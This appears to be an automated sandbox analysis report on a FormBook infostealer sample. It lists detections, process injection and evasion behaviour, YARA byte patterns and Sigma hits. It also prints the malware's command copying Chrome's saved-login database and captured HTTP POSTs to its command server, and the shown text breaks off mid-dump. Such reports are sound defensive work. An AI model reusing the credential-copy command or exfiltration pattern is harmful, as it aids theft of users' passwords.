Loading ...

Play interactive tourEdit tour

Analysis Report Ijxlcmh_Signed_.exe

Overview

General Information

Sample Name:Ijxlcmh_Signed_.exe
Analysis ID:299496
MD5:d5dd88f0d5994ec98e07b2fb77e72bc9
SHA1:60d36f37a02d126601b7fde79be4db52a43a6be3
SHA256:6c69a036d1c25c0c3203e2cc14ad23fd386bb69f3344fe78113e1f3f07b98a4c
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Ijxlcmh_Signed_.exe (PID: 6252 cmdline: 'C:\Users\user\Desktop\Ijxlcmh_Signed_.exe' MD5: D5DD88F0D5994EC98E07B2FB77E72BC9)
    • ieinstal.exe (PID: 2168 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Ijxldrv.exe (PID: 6976 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe' MD5: D5DD88F0D5994EC98E07B2FB77E72BC9)
          • ieinstal.exe (PID: 2616 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • Ijxldrv.exe (PID: 4112 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe' MD5: D5DD88F0D5994EC98E07B2FB77E72BC9)
          • ieinstal.exe (PID: 6232 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • autofmt.exe (PID: 6680 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • NETSTAT.EXE (PID: 6692 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 6776 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • msiexec.exe (PID: 6448 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
        • msiexec.exe (PID: 1000 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\lxjI.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x9b:$hotkey: \x0AHotKey=1
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\lxjI.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\lxjI.urlMethodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICODetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x70:$icon: IconFile=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x88e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x956a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1a4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1b4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x17409:$sqlite3step: 68 34 1C 7B E1
    • 0x1751c:$sqlite3step: 68 34 1C 7B E1
    • 0x17438:$sqlite3text: 68 38 2A 90 C5
    • 0x1755d:$sqlite3text: 68 38 2A 90 C5
    • 0x1744b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x17573:$sqlite3blob: 68 53 D8 7F 8C
    00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 64 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.ieinstal.exe.10410000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.ieinstal.exe.10410000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.ieinstal.exe.10410000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        18.2.ieinstal.exe.10410000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          18.2.ieinstal.exe.10410000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Steal Google chrome login dataShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\NETSTAT.EXE, ParentImage: C:\Windows\SysWOW64\NETSTAT.EXE, ParentProcessId: 6692, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 6776

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeReversingLabs: Detection: 25%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Ijxlcmh_Signed_.exeVirustotal: Detection: 25%Perma Link
          Source: Ijxlcmh_Signed_.exeReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.347301102.0000000010411000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.489865505.0000000000610000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.399200553.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.255722131.0000000010411000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254037466.0000000003E50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.490058063.0000000000640000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.367185514.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.488550629.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.401382635.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.347219785.0000000003E40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.333441854.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.352439392.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.372602980.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.399815412.00000000049D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.324932466.0000000003D3C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.333947953.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.366016750.0000000003060000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.400259752.0000000000A30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254839755.0000000003F16000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.324842296.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.347253674.0000000003E7C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Ijxlcmh_Signed_.exe.10410000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: 7.2.Ijxldrv.exe.10410000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 12.2.Ijxldrv.exe.10410000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 18.2.ieinstal.exe.10410000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.ieinstal.exe.10410000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.Ijxlcmh_Signed_.exe.10410000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 15.2.ieinstal.exe.10410000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exeCode function: 4x nop then mov eax, dword ptr [0040C7CCh]0_3_02243B34
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exeCode function: 4x nop then or edx, 00000200h0_3_02238308
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exeCode function: 4x nop then or edx, 00000200h0_3_02243928
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exeCode function: 4x nop then or edx, 00000200h0_3_02243935
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exeCode function: 4x nop then push 00000000h0_3_02238690
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exeCode function: 4x nop then push 00000000h0_3_02238698
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exeCode function: 4x nop then mov eax, dword ptr [0040C7CCh]0_3_02238514
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exeCode function: 4x nop then push 00000000h0_3_02243D9C
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exeCode function: 4x nop then push 00000000h0_3_0222B340
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exeCode function: 4x nop then push 00000000h0_3_0222B348
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exeCode function: 4x nop then mov eax, dword ptr [0040C7CCh]0_3_0222B1C4
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exeCode function: 4x nop then or edx, 00000200h0_3_0222AFB8
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then mov eax, dword ptr [0040C7CCh]7_3_02223B34
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then or edx, 00000200h7_3_02218308
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then or edx, 00000200h7_3_02223928
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then or edx, 00000200h7_3_02223935
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then push 00000000h7_3_02218690
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then push 00000000h7_3_02218698
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then mov eax, dword ptr [0040C7CCh]7_3_02218514
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then push 00000000h7_3_02223D9C
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then push 00000000h7_3_0220B340
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then push 00000000h7_3_0220B348
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then mov eax, dword ptr [0040C7CCh]7_3_0220B1C4
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then or edx, 00000200h7_3_0220AFB8
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then mov eax, dword ptr [0040C7CCh]12_3_02693B34
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then or edx, 00000200h12_3_02688308
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then or edx, 00000200h12_3_02693928
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then or edx, 00000200h12_3_02693935
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then push 00000000h12_3_02688698
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then push 00000000h12_3_02688690
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then mov eax, dword ptr [0040C7CCh]12_3_02688514
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then push 00000000h12_3_02693D9C
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then push 00000000h12_3_0267B340
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then push 00000000h12_3_0267B348
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then mov eax, dword ptr [0040C7CCh]12_3_0267B1C4
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 4x nop then or edx, 00000200h12_3_0267AFB8

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49755
          Uses netstat to query active network connections and open portsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /oav/?k0GdCl1=OGiTtEl8oZpE8Sv3fxvazbyjtykFcfSLP9Tv9n1IDimktFHXuVh+PBX3cY6ZEpQG1B1V&tZU4=NX1pk HTTP/1.1Host: www.mybabyshop4you.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: POST /oav/ HTTP/1.1Host: www.mybabyshop4you.comConnection: closeContent-Length: 717Cache-Control: no-cacheOrigin: http://www.mybabyshop4you.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mybabyshop4you.com/oav/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6b 30 47 64 43 6c 31 3d 47 6b 75 70 7a 68 42 47 6b 49 41 36 75 52 6d 52 4f 55 75 63 71 66 47 31 39 67 67 75 64 5f 32 68 4e 37 57 54 35 68 42 4e 47 54 61 65 73 55 47 4b 72 48 49 4a 4d 78 4b 6f 66 34 4b 57 5a 4a 51 33 35 44 51 5a 7e 6f 46 49 30 56 67 64 70 69 4d 77 6d 55 59 57 47 37 6a 5a 53 6d 30 75 4d 4b 68 64 30 49 30 65 63 61 67 41 4d 78 31 58 39 33 5a 65 79 70 50 69 37 4c 44 41 5a 41 7a 41 37 69 55 43 52 46 76 51 77 54 69 46 73 73 56 54 68 70 53 36 36 79 6b 79 53 55 54 41 6e 50 6b 66 75 77 4a 78 72 79 31 6b 6c 6a 56 6a 49 50 33 37 72 62 46 58 7e 52 54 52 64 73 4c 6d 77 31 53 4d 61 55 58 47 37 7a 55 68 5a 31 47 36 43 74 41 57 73 62 6a 34 46 58 65 54 55 69 41 51 65 49 71 48 64 4f 28 77 67 6a 28 78 6f 53 4a 61 46 44 57 61 32 38 39 49 74 36 45 64 4c 65 33 36 48 63 41 43 37 79 4b 6f 75 44 7a 4a 57 70 68 61 31 34 52 73 47 4e 69 4b 74 6f 51 47 33 77 46 51 58 71 53 6f 65 34 5a 41 55 58 69 74 33 7a 53 5f 42 49 55 7a 52 67 6f 74 56 47 6f 4c 56 76 6d 34 76 72 73 79 79 77 32 4c 64 66 34 34 4d 44 37 69 67 74 63 64 34 34 63 65 35 55 64 32 4d 4e 72 78 5a 4c 38 78 58 62 74 4f 51 48 4a 50 74 43 39 36 71 6b 48 31 4a 62 4a 62 51 37 5a 46 58 39 70 46 57 6d 71 4f 78 35 69 6b 47 41 58 58 6a 76 5a 63 48 53 73 5a 5a 42 6e 6a 68 39 36 4a 41 34 6b 74 76 68 55 5f 53 6a 78 4d 52 33 52 65 4c 52 77 50 4b 4e 42 64 71 53 59 64 6a 36 31 6f 47 37 39 4e 41 33 6b 71 6f 32 65 41 70 48 72 73 53 56 49 42 75 37 39 76 79 7a 44 52 51 4f 55 6a 79 66 53 2d 32 75 49 51 32 4a 55 50 5a 5f 28 65 6c 62 54 65 63 2d 4e 75 76 44 37 72 50 56 6b 62 51 44 28 6f 53 52 34 4a 45 5f 53 64 44 45 6f 50 74 48 6d 35 76 38 4c 44 4e 39 30 68 46 69 6d 62 31 70 4c 36 37 58 70 2d 75 4b 69 31 6a 4e 6c 42 66 44 6a 36 31 46 34 30 28 36 6f 4c 45 36 6c 5a 70 72 56 2d 57 38 37 45 34 6c 32 5f 38 47 39 76 6b 6d 5a 4d 57 48 51 34 66 51 39 75 76 42 44 67 53 31 56 72 61 35 4c 31 61 35 57 6e 33 73 6e 63 78 7a 41 5a 7a 38 4e 6c 73 62 38 53 30 58 43 4d 43 48 39 54 50 4f 66 53 63 64 70 69 30 49 35 43 6a 49 7e 35 76 50 72 47 42 4c 43 35 7a 5a 4c 52 6b 35 72 41 36 4d 53 41 4b 54 76 36 72 76 38 49 56 6a 5a 5f 65 73 39 34 71 46 47 57 68 56 44 57 71 54 6d 64 58 33 79 5f 4c 31 78 2d 42 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: k0GdCl1=GkupzhBGkIA6uRmROUucqfG19ggud_2hN7WT5hBNGTaesUGKrHIJMxKof4KWZJQ35DQZ~oFI0VgdpiMwmUYWG7jZSm0uMKhd0I0ecagAMx1X93ZeypPi7LDAZAzA7iUCRFvQwTiFssVThpS66ykySUTAnPkfuwJxry1kljVjIP37rbFX~RTRdsLmw1SMaUXG7zUhZ1G6CtAWsbj4FXeTUiAQeIqHdO(wgj(xoSJaFDWa289It6EdLe36HcAC7yKouDzJWpha14RsGNiKtoQG3wFQXqSoe4ZAUXit3zS_BIUzRgotVGoLVvm4vrsyyw2Ldf44MD7igtcd44ce5Ud2MNrxZL8xXbtOQHJPtC96qkH1JbJbQ7ZFX9pFWmqOx5ikGAXXjv
          Source: global trafficHTTP traffic detected: POST /oav/ HTTP/1.1Host: www.mybabyshop4you.comConnection: closeContent-Length: 169817Cache-Control: no-cacheOrigin: http://www.mybabyshop4you.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mybabyshop4you.com/oav/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6b 30 47 64 43 6c 31 3d 47 6b 75 70 7a 6a 78 34 69 34 31 30 71 6a 7a 32 49 48 57 45 75 62 36 6e 71 48 51 48 4a 38 4b 4c 58 74 65 39 35 6b 4a 42 53 69 4b 41 28 48 75 4b 67 6b 67 4b 49 52 4b 76 4c 49 4b 5a 50 35 63 4c 30 79 30 42 7e 70 42 6d 30 56 6f 65 6a 45 77 78 6e 45 59 61 48 62 75 39 51 6d 78 36 4d 4a 56 30 30 74 4d 47 5a 61 6b 41 52 52 74 56 78 79 38 61 69 59 44 74 34 37 76 5a 62 42 62 64 37 56 46 37 52 6d 53 44 78 53 4f 39 6f 61 39 63 34 5a 43 53 28 6c 77 33 4b 6b 57 49 37 39 5a 46 72 52 46 31 73 77 64 73 67 69 56 69 57 4c 6a 6c 39 73 67 30 37 67 57 72 52 64 37 59 77 32 7a 35 58 43 28 54 73 69 49 58 59 41 7a 66 61 73 45 51 78 36 69 6e 53 68 71 75 54 53 51 5f 42 59 37 56 61 66 43 30 68 68 48 68 6c 51 35 58 44 78 7e 47 6a 59 35 30 71 70 4a 53 41 2d 47 71 41 62 6c 43 78 44 71 67 74 42 65 61 62 70 68 35 33 34 52 67 4d 73 53 59 70 72 38 42 79 68 55 44 57 74 4f 34 51 4d 70 54 59 78 6a 53 70 68 79 75 53 4a 55 5f 46 42 6f 52 52 48 64 47 51 6f 57 49 6e 4c 73 58 79 79 50 4a 64 66 34 61 4d 43 37 45 67 63 49 64 35 71 55 33 30 56 64 36 41 64 72 73 4a 4c 73 67 4f 63 73 56 51 48 42 50 28 48 52 63 34 6c 66 31 4d 49 67 70 51 66 74 46 52 4e 70 46 65 47 71 4c 37 5a 69 39 47 43 65 75 69 75 31 63 57 55 6f 62 59 67 6e 54 69 38 65 2d 56 49 6c 34 6c 46 41 68 57 6a 63 62 52 77 42 43 4b 77 6c 79 4b 36 4d 4c 75 33 55 47 6c 49 74 6e 45 4b 49 55 41 33 74 31 6f 32 54 59 6f 44 28 65 44 45 6b 45 76 36 4a 73 6b 69 4f 4e 62 50 55 67 67 4e 4c 2d 67 35 30 63 35 5a 51 4e 5a 66 50 5a 6c 35 32 61 64 37 5a 45 6b 69 65 65 49 6a 45 58 49 43 50 52 64 77 41 68 4e 74 6d 46 46 6b 35 65 72 6c 6d 52 75 4f 6d 4d 4d 2d 4e 32 42 67 4c 64 79 35 6d 4b 79 77 77 35 6c 72 75 49 75 66 4e 6f 65 54 6a 75 39 6e 6f 6f 78 35 64 4a 42 74 38 48 33 4a 6b 6e 50 65 58 47 69 45 6d 38 74 46 55 50 76 32 41 4d 62 6a 41 64 4f 46 46 52 73 51 58 43 45 58 73 61 55 35 48 55 4b 4a 79 66 67 64 53 6d 32 54 